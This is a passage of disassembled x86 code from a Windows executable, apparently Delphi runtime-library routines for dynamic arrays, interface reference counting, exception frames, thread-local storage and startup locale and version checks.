mov eax, ebx
add ebx, [esi+ebp+2]
mov edx, esi
call sub_40341C
dec edi
jg short loc_40350F
pop ebp
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403522: ; CODE XREF: sub_403468+30�j
; sub_403468+C5�j
mov eax, ebx
add ebx, 4
call sub_403A7C
dec edi
jg short loc_403522
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403531: ; CODE XREF: sub_403468+38�j
; sub_403468+D6�j
mov eax, ebx
mov edx, esi
add ebx, 4
call sub_40393C
dec edi
jg short loc_403531
jmp short loc_40354D
; ---------------------------------------------------------------------------
loc_403542: ; CODE XREF: sub_403468+3E�j
pop edi
pop esi
pop ebx
pop eax
mov al, 2
jmp sub_402554
; ---------------------------------------------------------------------------
loc_40354D: ; CODE XREF: sub_403468+4F�j
; sub_403468+5B�j ...
pop edi
pop esi
pop ebx
pop eax
locret_403551: ; CODE XREF: sub_403468+3�j
retn
sub_403468 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403554 proc near ; CODE XREF: sub_40356C+92�p
; sub_403688+75�p
cmp ds:dword_406010, 0
jz short loc_403564
call ds:dword_406010
retn
; ---------------------------------------------------------------------------
loc_403564: ; CODE XREF: sub_403554+7�j
mov al, 10h
call sub_402554
sub_403554 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_40356C proc near ; CODE XREF: sub_40356C+CF�p
; sub_403688+AC�p
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
xor eax, eax
mov al, [ecx+1]
lea edi, [eax+ecx+0Ah]
mov ebp, [edi-4]
xor eax, eax
mov ecx, [edi-8]
push ecx
loc_403586: ; CODE XREF: sub_40356C+100�j
mov ecx, [edi+4]
sub ecx, eax
jle short loc_403598
mov edx, eax
add eax, esi
add edx, ebx
call sub_402570
loc_403598: ; CODE XREF: sub_40356C+1F�j
mov eax, [edi+4]
mov edx, [edi]
mov edx, [edx]
mov cl, [edx]
cmp cl, 0Ah
jz short loc_4035D7
cmp cl, 0Bh
jz short loc_4035E8
cmp cl, 0Ch
jz short loc_4035F9
cmp cl, 0Dh
jz short loc_40360A
cmp cl, 0Eh
jz short loc_40362A
cmp cl, 0Fh
jz loc_403643
cmp cl, 11h
jz loc_403654
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_402554
; ---------------------------------------------------------------------------
loc_4035D7: ; CODE XREF: sub_40356C+38�j
mov edx, [eax+esi]
add eax, ebx
call sub_40316C
mov eax, 4
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_4035E8: ; CODE XREF: sub_40356C+3D�j
mov edx, [eax+esi]
add eax, ebx
call sub_4033F8
mov eax, 4
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_4035F9: ; CODE XREF: sub_40356C+42�j
lea edx, [eax+esi]
add eax, ebx
call sub_403554
mov eax, 10h
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_40360A: ; CODE XREF: sub_40356C+47�j
xor ecx, ecx
mov cl, [edx+1]
push dword ptr [ecx+edx+2]
push dword ptr [ecx+edx+6]
mov ecx, [ecx+edx+0Ah]
mov ecx, [ecx]
lea edx, [eax+esi]
add eax, ebx
call sub_403688
pop eax
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_40362A: ; CODE XREF: sub_40356C+4C�j
xor ecx, ecx
mov cl, [edx+1]
mov ecx, [ecx+edx+2]
push ecx
mov ecx, edx
lea edx, [eax+esi]
add eax, ebx
call sub_40356C
pop eax
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_403643: ; CODE XREF: sub_40356C+51�j
mov edx, [eax+esi]
add eax, ebx
call sub_403A94
mov eax, 4
jmp short loc_403665
; ---------------------------------------------------------------------------
loc_403654: ; CODE XREF: sub_40356C+5A�j
mov ecx, edx
mov edx, [eax+esi]
add eax, ebx
call sub_403978
mov eax, 4
loc_403665: ; CODE XREF: sub_40356C+7A�j
; sub_40356C+8B�j ...
add eax, [edi+4]
add edi, 8
dec ebp
jnz loc_403586
pop ecx
sub ecx, eax
jle short loc_403681
lea edx, [eax+ebx]
add eax, esi
call sub_402570
loc_403681: ; CODE XREF: sub_40356C+109�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40356C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403688 proc near ; CODE XREF: sub_40356C+B6�p
; sub_403688+98�p ...
arg_0 = dword ptr 4
push ebx
push esi
push edi
push ebp
mov ebx, eax
mov esi, edx
mov edi, ecx
mov ebp, [esp+10h+arg_0]
mov cl, [edi]
cmp cl, 0Ah
jz short loc_4036CE
cmp cl, 0Bh
jz short loc_4036E5
cmp cl, 0Ch
jz short loc_4036F9
cmp cl, 0Dh
jz short loc_40370D
cmp cl, 0Eh
jz short loc_40372E
cmp cl, 0Fh
jz loc_40374B
cmp cl, 11h
jz loc_40375F
mov al, 2
pop ebp
pop edi
pop esi
pop ebx
jmp sub_402554
; ---------------------------------------------------------------------------
loc_4036CE: ; CODE XREF: sub_403688+13�j
; sub_403688+56�j
mov eax, ebx
mov edx, [esi]
call sub_40316C
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4036CE
jmp loc_403773
; ---------------------------------------------------------------------------
loc_4036E5: ; CODE XREF: sub_403688+18�j
; sub_403688+6D�j
mov eax, ebx
mov edx, [esi]
call sub_4033F8
add ebx, 4
add esi, 4
dec ebp
jnz short loc_4036E5
jmp short loc_403773
; ---------------------------------------------------------------------------
loc_4036F9: ; CODE XREF: sub_403688+1D�j
; sub_403688+81�j
mov eax, ebx
mov edx, esi
call sub_403554
add ebx, 10h
add esi, 10h
dec ebp
jnz short loc_4036F9
jmp short loc_403773
; ---------------------------------------------------------------------------
loc_40370D: ; CODE XREF: sub_403688+22�j
xor ecx, ecx
mov cl, [edi+1]
lea edi, [ecx+edi+2]
loc_403716: ; CODE XREF: sub_403688+A2�j
mov eax, ebx
mov edx, esi
mov ecx, [edi+8]
push dword ptr [edi+4]
call sub_403688
add ebx, [edi]
add esi, [edi]
dec ebp
jnz short loc_403716
jmp short loc_403773
; ---------------------------------------------------------------------------
loc_40372E: ; CODE XREF: sub_403688+27�j
; sub_403688+BF�j
mov eax, ebx
mov edx, esi
mov ecx, edi
call sub_40356C
xor eax, eax
mov al, [edi+1]
add ebx, [eax+edi+2]
add esi, [eax+edi+2]
dec ebp
jnz short loc_40372E
jmp short loc_403773
; ---------------------------------------------------------------------------
loc_40374B: ; CODE XREF: sub_403688+2C�j
; sub_403688+D3�j
mov eax, ebx
mov edx, [esi]
call sub_403A94
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40374B
jmp short loc_403773
; ---------------------------------------------------------------------------
loc_40375F: ; CODE XREF: sub_403688+35�j
; sub_403688+E9�j
mov eax, ebx
mov edx, [esi]
mov ecx, edi
call sub_403978
add ebx, 4
add esi, 4
dec ebp
jnz short loc_40375F
loc_403773: ; CODE XREF: sub_403688+58�j
; sub_403688+6F�j ...
pop ebp
pop edi
pop esi
pop ebx
retn 4
sub_403688 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
loc_40377C: ; DATA XREF: sub_403B88+2F�o
; BSS:off_407000�o
mov al, 11h
jmp sub_402554
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403784 proc near ; CODE XREF: sub_4037A4+106�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_403688
pop ebp
retn 4
sub_403784 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403794 proc near ; CODE XREF: sub_4037A4+B0�p
jmp sub_403468
sub_403794 endp
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40379C proc near ; CODE XREF: sub_4037A4+2F�p
call sub_40393C
retn
sub_40379C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037A4 proc near ; CODE XREF: sub_4037A4+173�p
; sub_403930+5�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov ebx, [ebp+var_4]
mov ebx, [ebx]
mov eax, [ebp+arg_0]
mov edi, [eax]
test edi, edi
jg short loc_4037DD
test edi, edi
jge short loc_4037CE
mov al, 4
call sub_402554
; ---------------------------------------------------------------------------
loc_4037CE: ; CODE XREF: sub_4037A4+21�j
mov eax, [ebp+var_4]
mov edx, esi
call sub_40379C
jmp loc_403927
; ---------------------------------------------------------------------------
loc_4037DD: ; CODE XREF: sub_4037A4+1D�j
xor eax, eax
mov [ebp+var_10], eax
test ebx, ebx
jz short loc_4037F1
sub ebx, 4
mov eax, [ebx]
mov [ebp+var_10], eax
sub ebx, 4
loc_4037F1: ; CODE XREF: sub_4037A4+40�j
xor eax, eax
mov al, [esi+1]
add esi, eax
mov eax, esi
mov edx, [eax+2]
mov [ebp+var_18], edx
mov edx, [eax+6]
test edx, edx
jz short loc_40380B
mov esi, [edx]
jmp short loc_40380D
; ---------------------------------------------------------------------------
loc_40380B: ; CODE XREF: sub_4037A4+61�j
xor esi, esi
loc_40380D: ; CODE XREF: sub_4037A4+65�j
mov eax, edi
imul [ebp+var_18]
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cdq
idiv edi
cmp eax, [ebp+var_18]
jz short loc_403827
mov al, 4
call sub_402554
; ---------------------------------------------------------------------------
loc_403827: ; CODE XREF: sub_4037A4+7A�j
add [ebp+var_1C], 8
test ebx, ebx
jz short loc_403834
cmp dword ptr [ebx], 1
jnz short loc_403869
loc_403834: ; CODE XREF: sub_4037A4+89�j
mov [ebp+var_20], ebx
cmp edi, [ebp+var_10]
jge short loc_403859
test esi, esi
jz short loc_403859
mov eax, ebx
add eax, 8
mov edx, edi
imul edx, [ebp+var_18]
add eax, edx
mov ecx, [ebp+var_10]
sub ecx, edi
mov edx, esi
call sub_403794
loc_403859: ; CODE XREF: sub_4037A4+96�j
; sub_4037A4+9A�j
lea eax, [ebp+var_20]
mov edx, [ebp+var_1C]
call sub_4024AC
mov ebx, [ebp+var_20]
jmp short loc_4038C7
; ---------------------------------------------------------------------------
loc_403869: ; CODE XREF: sub_4037A4+8E�j
dec dword ptr [ebx]
mov eax, [ebp+var_1C]
call sub_40246C
mov ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_14], eax
cmp edi, [ebp+var_14]
jge short loc_403883
mov [ebp+var_14], edi
loc_403883: ; CODE XREF: sub_4037A4+DA�j
test esi, esi
jz short loc_4038B1
mov edx, [ebp+var_14]
imul edx, [ebp+var_18]
mov eax, ebx
add eax, 8
xor ecx, ecx
call sub_402790
mov eax, [ebp+var_14]
push eax
mov edx, [ebp+var_4]
mov edx, [edx]
mov eax, ebx
add eax, 8
mov ecx, esi
call sub_403784
jmp short loc_4038C7
; ---------------------------------------------------------------------------
loc_4038B1: ; CODE XREF: sub_4037A4+E1�j
mov ecx, [ebp+var_14]
imul ecx, [ebp+var_18]
mov edx, ebx
add edx, 8
mov eax, [ebp+var_4]
mov eax, [eax]
call sub_402570
loc_4038C7: ; CODE XREF: sub_4037A4+C3�j
; sub_4037A4+10B�j
mov dword ptr [ebx], 1
add ebx, 4
mov [ebx], edi
add ebx, 4
mov edx, edi
sub edx, [ebp+var_10]
imul edx, [ebp+var_18]
mov eax, [ebp+var_18]
imul eax, [ebp+var_10]
add eax, ebx
xor ecx, ecx
call sub_402790
cmp [ebp+var_8], 1
jle short loc_403922
add [ebp+arg_0], 4
dec [ebp+var_8]
dec edi
test edi, edi
jl short loc_403922
inc edi
mov [ebp+var_C], 0
loc_403908: ; CODE XREF: sub_4037A4+17C�j
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+var_C]
lea eax, [ebx+eax*4]
mov ecx, [ebp+var_8]
mov edx, esi
call sub_4037A4
inc [ebp+var_C]
dec edi
jnz short loc_403908
loc_403922: ; CODE XREF: sub_4037A4+14E�j
; sub_4037A4+15A�j
mov eax, [ebp+var_4]
mov [eax], ebx
loc_403927: ; CODE XREF: sub_4037A4+34�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4037A4 endp
; =============== S U B R O U T I N E =======================================
sub_403930 proc near ; CODE XREF: sub_403F04+7D�p
; sub_403F04+B5�p ...
var_4 = dword ptr -4
push esp
add [esp+4+var_4], 4
call sub_4037A4
retn
sub_403930 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40393C proc near ; CODE XREF: sub_403468+D0�p
; sub_40379C�p ...
mov ecx, [eax]
test ecx, ecx
jz short locret_403975
mov dword ptr [eax], 0
lock dec dword ptr [ecx-8]
jnz short locret_403975
push eax
mov eax, ecx
xor ecx, ecx
mov cl, [edx+1]
mov edx, [ecx+edx+6]
test edx, edx
jz short loc_40396C
mov ecx, [eax-4]
test ecx, ecx
jz short loc_40396C
mov edx, [edx]
call sub_403468
loc_40396C: ; CODE XREF: sub_40393C+20�j
; sub_40393C+27�j
sub eax, 8
call sub_40248C
pop eax
locret_403975: ; CODE XREF: sub_40393C+4�j
; sub_40393C+10�j
retn
sub_40393C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403978 proc near ; CODE XREF: sub_40356C+EF�p
; sub_403688+DD�p
push ebx
mov ebx, [eax]
test edx, edx
jz short loc_403983
lock inc dword ptr [edx-8]
loc_403983: ; CODE XREF: sub_403978+5�j
test ebx, ebx
jz short loc_40399B
lock dec dword ptr [ebx-8]
jnz short loc_40399B
push eax
push edx
mov edx, ecx
inc dword ptr [ebx-8]
call sub_40393C
pop edx
pop eax
loc_40399B: ; CODE XREF: sub_403978+D�j
; sub_403978+13�j
mov [eax], edx
pop ebx
retn
sub_403978 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039A0 proc near ; CODE XREF: sub_403A0C+1B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, ds:dword_406028
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4039F3
loc_4039BA: ; CODE XREF: sub_4039A0+51�j
xor eax, eax
push ebp
push offset loc_4039DB
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_8]
mov eax, [ebp+var_4]
call dword ptr [ebx+4]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_4039E5
; ---------------------------------------------------------------------------
loc_4039DB: ; DATA XREF: sub_4039A0+1D�o
jmp loc_402A88
; ---------------------------------------------------------------------------
call sub_402C40
loc_4039E5: ; CODE XREF: sub_4039A0+39�j
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4039BA
loc_4039F3: ; CODE XREF: sub_4039A0+18�j
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4039A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4039FC proc near ; CODE XREF: sub_403D14+5�p
mov edx, ds:dword_406024
mov [eax], edx
mov ds:dword_406024, eax
retn
sub_4039FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A0C proc near ; CODE XREF: sub_403028+70�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], eax
xor edx, edx
push ebp
push offset loc_403A70
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+4]
call sub_4039A0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403A77
loc_403A39: ; CODE XREF: sub_403A0C+69�j
mov eax, [ebp+var_4]
cmp eax, ds:dword_406024
jnz short loc_403A50
mov eax, [ebp+var_4]
mov eax, [eax]
mov ds:dword_406024, eax
jmp short loc_403A6F
; ---------------------------------------------------------------------------
loc_403A50: ; CODE XREF: sub_403A0C+36�j
mov eax, ds:dword_406024
test eax, eax
jz short loc_403A6F
loc_403A59: ; CODE XREF: sub_403A0C+61�j
mov edx, [eax]
cmp edx, [ebp+var_4]
jnz short loc_403A69
mov edx, [ebp+var_4]
mov edx, [edx]
mov [eax], edx
jmp short loc_403A6F
; ---------------------------------------------------------------------------
loc_403A69: ; CODE XREF: sub_403A0C+52�j
mov eax, [eax]
test eax, eax
jnz short loc_403A59
loc_403A6F: ; CODE XREF: sub_403A0C+42�j
; sub_403A0C+4B�j ...
retn
; ---------------------------------------------------------------------------
loc_403A70: ; DATA XREF: sub_403A0C+A�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403A39
; ---------------------------------------------------------------------------
loc_403A77: ; CODE XREF: sub_403A0C:loc_403A6F�j
; DATA XREF: sub_403A0C+28�o
pop ecx
pop ebp
retn
sub_403A0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403A7C proc near ; CODE XREF: sub_403468+BF�p
mov edx, [eax]
test edx, edx
jz short locret_403A90
mov dword ptr [eax], 0
push eax
push edx
mov eax, [edx]
call dword ptr [eax+8]
pop eax
locret_403A90: ; CODE XREF: sub_403A7C+4�j
retn
sub_403A7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403A94 proc near ; CODE XREF: sub_40356C+DC�p
; sub_403688+C7�p
test edx, edx
jz short loc_403AB1
push edx
push eax
mov eax, [edx]
push edx
call dword ptr [eax+4]
pop eax
mov ecx, [eax]
pop dword ptr [eax]
test ecx, ecx
jnz short loc_403AAA
retn
; ---------------------------------------------------------------------------
loc_403AAA: ; CODE XREF: sub_403A94+13�j
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
retn
; ---------------------------------------------------------------------------
loc_403AB1: ; CODE XREF: sub_403A94+2�j
mov ecx, [eax]
test ecx, ecx
mov [eax], edx
jz short locret_403ABF
mov eax, [ecx]
push ecx
call dword ptr [eax+8]
locret_403ABF: ; CODE XREF: sub_403A94+23�j
retn
sub_403A94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AC0 proc near ; CODE XREF: sub_403B88+AD�p
; sub_403B88+BE�p
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
xor edx, edx
push ebp
push offset loc_403B26
push dword ptr fs:[edx]
mov fs:[edx], esp
push 7
lea edx, [ebp+var_B]
push edx
push 1004h
push eax
call sub_401064 ; GetLocaleInfoA
lea eax, [ebp+var_10]
lea edx, [ebp+var_B]
mov ecx, 7
call sub_403284
mov eax, [ebp+var_10]
lea edx, [ebp+var_4]
call sub_4027B0
mov ebx, eax
cmp [ebp+var_4], 0
jz short loc_403B10
xor ebx, ebx
loc_403B10: ; CODE XREF: sub_403AC0+4C�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403B2D
loc_403B1D: ; CODE XREF: sub_403AC0+6B�j
lea eax, [ebp+var_10]
call sub_403118
retn
; ---------------------------------------------------------------------------
loc_403B26: ; DATA XREF: sub_403AC0+F�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403B1D
; ---------------------------------------------------------------------------
loc_403B2D: ; CODE XREF: sub_403AC0+65�j
; DATA XREF: sub_403AC0+58�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_403AC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403B34 proc near ; DATA XREF: CODE:00405968�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403B7E
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4075A4
jnz short loc_403B70
mov eax, offset dword_407038
call sub_4026FC
mov eax, offset dword_407204
call sub_4026FC
mov eax, offset dword_4073D0
call sub_4026FC
call sub_401870
loc_403B70: ; CODE XREF: sub_403B34+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403B85
loc_403B7D: ; CODE XREF: sub_403B34+4F�j
retn
; ---------------------------------------------------------------------------
loc_403B7E: ; DATA XREF: sub_403B34+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403B7D
; ---------------------------------------------------------------------------
loc_403B85: ; CODE XREF: sub_403B34:loc_403B7D�j
; DATA XREF: sub_403B34+44�o
pop ebp
retn
sub_403B34 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403B88 proc near ; DATA XREF: CODE:00405964�o
sub ds:dword_4075A4, 1
jnb locret_403C5A
mov ds:byte_406008, 2
mov ds:off_407010, offset sub_40101C
mov ds:off_407014, offset sub_401024
mov ds:byte_407036, 2
mov ds:off_407000, offset loc_40377C
call sub_40288C
test al, al
jz short loc_403BCF
call sub_4028BC
loc_403BCF: ; CODE XREF: sub_403B88+40�j
call sub_402980
mov ds:word_40703C, 0D7B0h
mov ds:word_407208, 0D7B0h
mov ds:word_4073D4, 0D7B0h
call sub_40105C ; GetCommandLineA
mov ds:dword_40702C, eax
call sub_4010BC
mov ds:dword_407028, eax
call sub_4010B4 ; GetVersion
and eax, 80000000h
cmp eax, 80000000h
jz short loc_403C41
call sub_4010B4 ; GetVersion
and eax, 0FFh
cmp ax, 4
jbe short loc_403C30
mov ds:dword_4075A8, 3
jmp short loc_403C50
; ---------------------------------------------------------------------------
loc_403C30: ; CODE XREF: sub_403B88+9A�j
call sub_40107C ; GetThreadLocale
call sub_403AC0
mov ds:dword_4075A8, eax
jmp short loc_403C50
; ---------------------------------------------------------------------------
loc_403C41: ; CODE XREF: sub_403B88+8A�j
call sub_40107C ; GetThreadLocale
call sub_403AC0
mov ds:dword_4075A8, eax
loc_403C50: ; CODE XREF: sub_403B88+A6�j
; sub_403B88+B7�j
call sub_4010AC ; GetCurrentThreadId
mov ds:dword_407020, eax
locret_403C5A: ; CODE XREF: sub_403B88+7�j
retn
sub_403B88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403C5C proc near ; CODE XREF: sub_403D20+C�p
jmp ds:dword_408148
sub_403C5C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403C64 proc near ; CODE XREF: sub_403C7C+3�p
jmp ds:dword_408144
sub_403C64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403C6C proc near ; CODE XREF: sub_403CD4+25�p
; sub_403CD4+36�p
jmp ds:dword_408140
sub_403C6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403C74 proc near ; CODE XREF: sub_403C90+3D�p
jmp ds:dword_40813C
sub_403C74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403C7C proc near ; CODE XREF: sub_403C90+21�p
push eax
push 40h
call sub_403C64 ; LocalAlloc
retn
sub_403C7C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403C88 proc near ; CODE XREF: sub_403C90+1�p
mov eax, 8
retn
sub_403C88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403C90 proc near ; CODE XREF: sub_403CD4:loc_403CEE�p
push ebx
call sub_403C88
mov ebx, eax
test ebx, ebx
jz short loc_403CD2
cmp ds:TlsIndex, 0FFFFFFFFh
jnz short loc_403CAF
mov eax, 0E2h
call sub_40310C
; ---------------------------------------------------------------------------
loc_403CAF: ; CODE XREF: sub_403C90+13�j
mov eax, ebx
call sub_403C7C
test eax, eax
jnz short loc_403CC6
mov eax, 0E2h
call sub_40310C
; ---------------------------------------------------------------------------
jmp short loc_403CD2
; ---------------------------------------------------------------------------
loc_403CC6: ; CODE XREF: sub_403C90+28�j
push eax
mov eax, ds:TlsIndex
push eax
call sub_403C74 ; TlsSetValue
loc_403CD2: ; CODE XREF: sub_403C90+A�j
; sub_403C90+34�j
pop ebx
retn
sub_403C90 endp
; =============== S U B R O U T I N E =======================================
sub_403CD4 proc near ; CODE XREF: sub_402508+20�p
; sub_402560+3�p ...
mov cl, ds:byte_40764C
mov eax, ds:TlsIndex
test cl, cl
jnz short loc_403D09
mov edx, large fs:2Ch
mov eax, [edx+eax*4]
retn
; ---------------------------------------------------------------------------
loc_403CEE: ; CODE XREF: sub_403CD4+3D�j
call sub_403C90
mov eax, ds:TlsIndex
push eax
call sub_403C6C ; TlsGetValue
test eax, eax
jz short loc_403D03
retn
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: sub_403CD4+2C�j
mov eax, ds:dword_407658
retn
; ---------------------------------------------------------------------------
loc_403D09: ; CODE XREF: sub_403CD4+D�j
push eax
call sub_403C6C ; TlsGetValue
test eax, eax
jz short loc_403CEE
retn
sub_403CD4 endp
; =============== S U B R O U T I N E =======================================
sub_403D14 proc near ; CODE XREF: sub_403D20+2E�p
mov eax, offset dword_406090
call sub_4039FC
retn
sub_403D14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403D20 proc near ; CODE XREF: CODE:004059DE�p
push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0
call sub_403C5C ; GetModuleHandleA
mov ds:dword_407650, eax
mov eax, ds:dword_407650
mov ds:dword_406094, eax
xor eax, eax
mov ds:dword_406098, eax
xor eax, eax
mov ds:dword_40609C, eax
call sub_403D14
mov edx, offset dword_406090
mov eax, ebx
call sub_402ED0
pop ebx
retn
sub_403D20 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D64 proc near ; DATA XREF: CODE:00405960�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403D89
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_407654
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403D90
loc_403D88: ; CODE XREF: sub_403D64+2A�j
retn
; ---------------------------------------------------------------------------
loc_403D89: ; DATA XREF: sub_403D64+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403D88
; ---------------------------------------------------------------------------
loc_403D90: ; CODE XREF: sub_403D64:loc_403D88�j
; DATA XREF: sub_403D64+1F�o
pop ebp
retn
sub_403D64 endp
; ---------------------------------------------------------------------------
align 4
loc_403D94: ; DATA XREF: CODE:off_40595C�o
sub ds:dword_407654, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D9C proc near ; DATA XREF: CODE:00405970�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403DC1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_40765C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403DC8
loc_403DC0: ; CODE XREF: sub_403D9C+2A�j
retn
; ---------------------------------------------------------------------------
loc_403DC1: ; DATA XREF: sub_403D9C+6�o
jmp loc_402BB4
; ---------------------------------------------------------------------------
jmp short loc_403DC0
; ---------------------------------------------------------------------------
loc_403DC8: ; CODE XREF: sub_403D9C:loc_403DC0�j
; DATA XREF: sub_403D9C+1F�o
pop ebp
retn
sub_403D9C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403DCC proc near ; DATA XREF: CODE:0040596C�o
sub ds:dword_40765C, 1
retn
sub_403DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DD4 proc near ; CODE XREF: CODE:00405A5A�p
jmp ds:dword_408164
sub_403DD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DDC proc near ; CODE XREF: sub_403E94+9�p
jmp ds:dword_408160
sub_403DDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DE4 proc near ; CODE XREF: sub_403E94+4�p
; sub_4046BC+71�p ...
jmp ds:dword_40815C
sub_403DE4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DEC proc near ; CODE XREF: sub_4058BC+6�p
; sub_4058BC:loc_405907�p
jmp ds:dword_408158
sub_403DEC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DF4 proc near ; CODE XREF: sub_4050C0+42�p
; sub_4050C0+377�p ...
jmp ds:dword_408154
sub_403DF4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403DFC proc near ; CODE XREF: sub_4058BC+46�p
jmp ds:dword_408150
sub_403DFC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_403E04 proc near ; CODE XREF: sub_4058BC+3F�p
jmp ds:dword_408178
sub_403E04 endp
; ---------------------------------------------------------------------------
align 4
